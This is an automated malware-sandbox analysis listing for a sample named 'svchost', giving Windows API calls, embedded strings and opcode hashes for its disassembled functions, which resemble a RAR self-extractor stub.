                                                            • Instruction ID: 8c270b99a8a7a66523ffb2698f3751c4cc09a0b899697d8a5fc353f3022a6dc2
                                                            • Opcode Fuzzy Hash: 3795f6bc234da431ce41f7d9c1119c6b54e3022c1398b6f1223acfeba25bcf6e
                                                            • Instruction Fuzzy Hash: DEA01130202200AB8B008F30AE082083AA8BA2228030A002AA008C00A0EA2080A0AB00
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 0083E30E
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                              • Part of subcall function 00841DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00871030,00000200,0083D928,00000000,?,00000050,00871030), ref: 00841DC4
                                                            • _strlen.LIBCMT ref: 0083E32F
                                                            • SetDlgItemTextW.USER32(?,0086E274,?), ref: 0083E38F
                                                            • GetWindowRect.USER32(?,?), ref: 0083E3C9
                                                            • GetClientRect.USER32(?,?), ref: 0083E3D5
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0083E475
                                                            • GetWindowRect.USER32(?,?), ref: 0083E4A2
                                                            • SetWindowTextW.USER32(?,?), ref: 0083E4DB
                                                            • GetSystemMetrics.USER32(00000008), ref: 0083E4E3
                                                            • GetWindow.USER32(?,00000005), ref: 0083E4EE
                                                            • GetWindowRect.USER32(00000000,?), ref: 0083E51B
                                                            • GetWindow.USER32(00000000,00000002), ref: 0083E58D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                            • String ID: $%s:$CAPTION$d
                                                            • API String ID: 2407758923-2512411981
                                                            • Opcode ID: 158c2cd38ad7c370341c61bec972be951d22f2d5e7a30b9e3561497e60b9343e
                                                            • Instruction ID: b42c50530b88019d0cbed75561fdcf5c0c4b976523bcd239c59d5aa406a03083
                                                            • Opcode Fuzzy Hash: 158c2cd38ad7c370341c61bec972be951d22f2d5e7a30b9e3561497e60b9343e
                                                            • Instruction Fuzzy Hash: 2A818072608301AFD710DFA8CD89A6FBBE9FBC9704F04091DFA84D72A0D675E9058B52
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 0085CB66
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C71E
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C730
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C742
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C754
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C766
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C778
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C78A
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C79C
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C7AE
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C7C0
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C7D2
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C7E4
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C7F6
                                                            • _free.LIBCMT ref: 0085CB5B
                                                              • Part of subcall function 00858DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34), ref: 00858DE2
                                                              • Part of subcall function 00858DCC: GetLastError.KERNEL32(00863A34,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34,00863A34), ref: 00858DF4
                                                            • _free.LIBCMT ref: 0085CB7D
                                                            • _free.LIBCMT ref: 0085CB92
                                                            • _free.LIBCMT ref: 0085CB9D
                                                            • _free.LIBCMT ref: 0085CBBF
                                                            • _free.LIBCMT ref: 0085CBD2
                                                            • _free.LIBCMT ref: 0085CBE0
                                                            • _free.LIBCMT ref: 0085CBEB
                                                            • _free.LIBCMT ref: 0085CC23
                                                            • _free.LIBCMT ref: 0085CC2A
                                                            • _free.LIBCMT ref: 0085CC47
                                                            • _free.LIBCMT ref: 0085CC5F
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: b289708b82d21e55144256aaf5e41fa563ebcfc86dd94396585da9526bb9c416
                                                            • Instruction ID: ddd9bda340a654fdb53cf803b45a9e1cca250640fa9c4da80ed27d29e0afe1f7
                                                            • Opcode Fuzzy Hash: b289708b82d21e55144256aaf5e41fa563ebcfc86dd94396585da9526bb9c416
                                                            • Instruction Fuzzy Hash: FE312E31600309DFEB21AA7DD846B5A7BF9FF10362F14541AE958E7192DE35AC48CF12
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00849736
                                                            • _wcslen.LIBCMT ref: 008497D6
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 008497E5
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00849806
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0084982D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                            • API String ID: 1777411235-4209811716
                                                            • Opcode ID: 5a23713f07110f0f3cc25ed8e27e8095fdd9deda3accf5e520477edadb6956d8
                                                            • Instruction ID: 6d157f41da370e0ed29f46c6020fb856c4b0a01984bbfb6e6ccb36f796c5c9b7
                                                            • Opcode Fuzzy Hash: 5a23713f07110f0f3cc25ed8e27e8095fdd9deda3accf5e520477edadb6956d8
                                                            • Instruction Fuzzy Hash: C13137325083057AE735AF289C06F6F77D8FF52321F15011DF941D61D2EB649A0883A7
                                                            APIs
                                                            • GetWindow.USER32(?,00000005), ref: 0084D6C1
                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 0084D6ED
                                                              • Part of subcall function 00841FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0083C116,00000000,.exe,?,?,00000800,?,?,?,00848E3C), ref: 00841FD1
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0084D709
                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0084D720
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0084D734
                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0084D75D
                                                            • DeleteObject.GDI32(00000000), ref: 0084D764
                                                            • GetWindow.USER32(00000000,00000002), ref: 0084D76D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                            • String ID: STATIC
                                                            • API String ID: 3820355801-1882779555
                                                            • Opcode ID: 4ba8a08589158eccc3b57f3c3040e6f0bf42bfbefdbdbc229c531ca033df2ec7
                                                            • Instruction ID: fe6a1ac0ab090bbe780e6dc223d5ffc4248e3a6a50c00b190f85a2640faba4db
                                                            • Opcode Fuzzy Hash: 4ba8a08589158eccc3b57f3c3040e6f0bf42bfbefdbdbc229c531ca033df2ec7
                                                            • Instruction Fuzzy Hash: E41178322447187BE6207BB4AC8AFAF765CFF14711F058122FA01E60E1DB64CF0542B6
                                                            APIs
                                                            • _free.LIBCMT ref: 00859705
                                                              • Part of subcall function 00858DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34), ref: 00858DE2
                                                              • Part of subcall function 00858DCC: GetLastError.KERNEL32(00863A34,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34,00863A34), ref: 00858DF4
                                                            • _free.LIBCMT ref: 00859711
                                                            • _free.LIBCMT ref: 0085971C
                                                            • _free.LIBCMT ref: 00859727
                                                            • _free.LIBCMT ref: 00859732
                                                            • _free.LIBCMT ref: 0085973D
                                                            • _free.LIBCMT ref: 00859748
                                                            • _free.LIBCMT ref: 00859753
                                                            • _free.LIBCMT ref: 0085975E
                                                            • _free.LIBCMT ref: 0085976C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 5da0d798d5e4b927ae01d22daca421d90e5f2d5d33883888cd532dc020d8519c
                                                            • Instruction ID: 9235e607c78137536858b0bf74964531a9b61f3c94e19cf200f2072f2576bad1
                                                            • Opcode Fuzzy Hash: 5da0d798d5e4b927ae01d22daca421d90e5f2d5d33883888cd532dc020d8519c
                                                            • Instruction Fuzzy Hash: 4C119276110109EFCB01EF98C842CD93FB5FF14391B5155A2FA089B262DE32DA589B85
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 322700389-393685449
                                                            • Opcode ID: c8e01dfe44aaebb013a1829770c5bac70331ea1c9772abec7efd1693aa2f1be4
                                                            • Instruction ID: b0fc29813ffb71dc2a022b4a7e45f1f1b843157c6bdb3d0c9d38c1e1f98fb4a0
                                                            • Opcode Fuzzy Hash: c8e01dfe44aaebb013a1829770c5bac70331ea1c9772abec7efd1693aa2f1be4
                                                            • Instruction Fuzzy Hash: 47B17931800619EFCF25DFA8D8819AEB7B5FF05352B144559FC01AB212DB31DA59CF92
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00836FAA
                                                            • _wcslen.LIBCMT ref: 00837013
                                                            • _wcslen.LIBCMT ref: 00837084
                                                              • Part of subcall function 00837A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00837AAB
                                                              • Part of subcall function 00837A9C: GetLastError.KERNEL32 ref: 00837AF1
                                                              • Part of subcall function 00837A9C: CloseHandle.KERNEL32(?), ref: 00837B00
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Similarity
                                                            • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3122303884-3508440684
                                                            APIs
                                                              • Part of subcall function 00831316: GetDlgItem.USER32(00000000,00003021), ref: 0083135A
                                                              • Part of subcall function 00831316: SetWindowTextW.USER32(00000000,008635F4), ref: 00831370
                                                            • EndDialog.USER32(?,00000001), ref: 0084B610
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 0084B637
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0084B650
                                                            • SetWindowTextW.USER32(?,?), ref: 0084B661
                                                            • GetDlgItem.USER32(?,00000065), ref: 0084B66A
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0084B67E
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0084B694
                                                            Similarity
                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                            • String ID: LICENSEDLG
                                                            • API String ID: 3214253823-2177901306
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,7EEF2A03,00000001,00000000,00000000,?,?,0083AF6C,ROOT\CIMV2), ref: 0084FD99
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0083AF6C,ROOT\CIMV2), ref: 0084FE14
                                                            • SysAllocString.OLEAUT32(00000000), ref: 0084FE1F
                                                            • _com_issue_error.COMSUPP ref: 0084FE48
                                                            • _com_issue_error.COMSUPP ref: 0084FE52
                                                            • GetLastError.KERNEL32(80070057,7EEF2A03,00000001,00000000,00000000,?,?,0083AF6C,ROOT\CIMV2), ref: 0084FE57
                                                            • _com_issue_error.COMSUPP ref: 0084FE6A
                                                            • GetLastError.KERNEL32(00000000,?,?,0083AF6C,ROOT\CIMV2), ref: 0084FE80
                                                            • _com_issue_error.COMSUPP ref: 0084FE93
                                                            Similarity
                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 1353541977-0
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                            • API String ID: 3519838083-3505469590
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00839387
                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 008393AA
                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 008393C9
                                                              • Part of subcall function 0083C29A: _wcslen.LIBCMT ref: 0083C2A2
                                                              • Part of subcall function 00841FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0083C116,00000000,.exe,?,?,00000800,?,?,?,00848E3C), ref: 00841FD1
                                                            • _swprintf.LIBCMT ref: 00839465
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                            • MoveFileW.KERNEL32(?,?), ref: 008394D4
                                                            • MoveFileW.KERNEL32(?,?), ref: 00839514
                                                            Similarity
                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: rtmp%d
                                                            • API String ID: 3726343395-3303766350
                                                            APIs
                                                            • __aulldiv.LIBCMT ref: 0084122E
                                                              • Part of subcall function 0083B146: GetVersionExW.KERNEL32(?), ref: 0083B16B
                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00841251
                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00841263
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00841274
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00841284
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00841294
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 008412CF
                                                            • __aullrem.LIBCMT ref: 00841379
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                            • String ID:
                                                            • API String ID: 1247370737-0
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00832536
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                              • Part of subcall function 008405DA: _wcslen.LIBCMT ref: 008405E0
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf_wcslen
                                                            • String ID: ;%u$x%u$xc%u
                                                            • API String ID: 3053425827-2277559157
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                            • API String ID: 176396367-3568243669
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0085FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0085F6CF
                                                            • __fassign.LIBCMT ref: 0085F74A
                                                            • __fassign.LIBCMT ref: 0085F765
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0085F78B
                                                            • WriteFile.KERNEL32(?,00000000,00000000,0085FE02,00000000,?,?,?,?,?,?,?,?,?,0085FE02,00000000), ref: 0085F7AA
                                                            • WriteFile.KERNEL32(?,00000000,00000001,0085FE02,00000000,?,?,?,?,?,?,?,?,?,0085FE02,00000000), ref: 0085F7E3
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 00852937
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0085293F
                                                            • _ValidateLocalCookies.LIBCMT ref: 008529C8
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 008529F3
                                                            • _ValidateLocalCookies.LIBCMT ref: 00852A48
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 00849EEE
                                                            • GetWindowRect.USER32(?,00000000), ref: 00849F44
                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 00849FDB
                                                            • SetWindowTextW.USER32(?,00000000), ref: 00849FE3
                                                            • ShowWindow.USER32(00000000,00000005), ref: 00849FF9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$RectText
                                                            • String ID: RarHtmlClassName
                                                            • API String ID: 3937224194-1658105358
                                                            • Opcode ID: ac543cd67131bd9abf0b8aced5f37f39baa293e60616c29b3aaf84d707dd403d
                                                            • Instruction ID: 56e4baaa1004bfeb002f9873d4394c0565c939a2f48a6687806e91d899522903
                                                            • Opcode Fuzzy Hash: ac543cd67131bd9abf0b8aced5f37f39baa293e60616c29b3aaf84d707dd403d
                                                            • Instruction Fuzzy Hash: B641B531108318EFCB316F64DC49B6B7BA8FF48705F04455AF849DA166DB34DA08CB62
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                            • API String ID: 176396367-3743748572
                                                            • Opcode ID: 9739dd84df03d1942c69221b0ec02042cbc23338adc698d038f077108efedffe
                                                            • Instruction ID: 1bef273dcd3931d409fbbf454058bcfdbcabae0d5b3d9130eabc6fe56ff206ea
                                                            • Opcode Fuzzy Hash: 9739dd84df03d1942c69221b0ec02042cbc23338adc698d038f077108efedffe
                                                            • Instruction Fuzzy Hash: B13129226443595ADA30EF949C42B7B73E4FB90760F50841FF8D6D72C0FB64AD9983A2
                                                            APIs
                                                              • Part of subcall function 0085C868: _free.LIBCMT ref: 0085C891
                                                            • _free.LIBCMT ref: 0085C8F2
                                                              • Part of subcall function 00858DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34), ref: 00858DE2
                                                              • Part of subcall function 00858DCC: GetLastError.KERNEL32(00863A34,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34,00863A34), ref: 00858DF4
                                                            • _free.LIBCMT ref: 0085C8FD
                                                            • _free.LIBCMT ref: 0085C908
                                                            • _free.LIBCMT ref: 0085C95C
                                                            • _free.LIBCMT ref: 0085C967
                                                            • _free.LIBCMT ref: 0085C972
                                                            • _free.LIBCMT ref: 0085C97D
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction ID: f4aea3e4f543d78a94119c9566ffffc011f195ea41d62b36790ec109805ea864
                                                            • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction Fuzzy Hash: EF110071580708EAE520B775CC07FCB7BECFF14B02F804C25BAADE6092DA65A5498B52
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0084E669,0084E5CC,0084E86D), ref: 0084E605
                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0084E61B
                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0084E630
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            • API String ID: 667068680-1718035505
                                                            • Opcode ID: 1603a2884e175f93dbc657a9e8e0dd3f6f6fd2445c02529dca5ebc5c7390d421
                                                            • Instruction ID: 4fe7712db5855c93ed6d1d0f19e78f38f6b65af3388894479654879c1c3bd3f1
                                                            • Opcode Fuzzy Hash: 1603a2884e175f93dbc657a9e8e0dd3f6f6fd2445c02529dca5ebc5c7390d421
                                                            • Instruction Fuzzy Hash: 25F0F03178466E9B4F315FB46C8CA66A2C9FB35749F07053EE902D3240EB64CC58DB91
                                                            APIs
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 008414C2
                                                              • Part of subcall function 0083B146: GetVersionExW.KERNEL32(?), ref: 0083B16B
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008414E6
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00841500
                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00841513
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00841523
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00841533
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: c5c42cb2fb0133f19b2256336b806546607eca1cbcd9e2dcec7517e996d623b4
                                                            • Instruction ID: c276adda4be48dd3d38a694f841d746a05c07770536fd4523089c35766b87222
                                                            • Opcode Fuzzy Hash: c5c42cb2fb0133f19b2256336b806546607eca1cbcd9e2dcec7517e996d623b4
                                                            • Instruction Fuzzy Hash: 4831E875118349ABC704DFA8C88499BB7F8FF98714F015A1EF999C3210E770D549CBA6
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00852AF1,008502FC,0084FA34), ref: 00852B08
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00852B16
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00852B2F
                                                            • SetLastError.KERNEL32(00000000,00852AF1,008502FC,0084FA34), ref: 00852B81
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
